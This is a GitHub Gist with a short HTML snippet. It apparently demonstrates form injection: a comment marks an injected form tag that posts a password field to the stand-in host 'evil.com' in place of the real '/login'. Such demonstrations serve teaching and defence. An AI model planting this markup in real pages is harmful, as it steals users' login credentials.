Last active
July 19, 2016 15:09
-
-
Save intchloe/9d69b45cad45d9e7fc842a67f9d507d7 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- The hacker injected this (line 2) --> | |
| <form action="https://evil.com" method="post" name="fblogin" id="login"> | |
| </form><form action="/login" method="post" name="fblogin" id="login"> | |
| <input type="password" name="pasword" /> | |
| <input type="submit" name="login" name="fblogin"> | |
| </form> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment